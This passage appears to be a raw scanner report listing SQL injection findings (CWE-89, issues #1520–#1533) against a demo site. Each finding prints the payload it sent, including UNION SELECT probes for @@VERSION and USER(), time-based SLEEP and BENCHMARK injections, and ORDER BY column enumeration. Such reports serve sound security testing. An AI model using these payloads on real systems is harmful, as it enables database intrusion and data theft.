href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1520\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1521\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1522\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ') or ('x')=('x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1523\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '''''''''''''UNION SELECT '2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1524\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1525\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1526Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1527\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1528\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or pg_SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1529\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1530\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1531\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1532\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1533\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 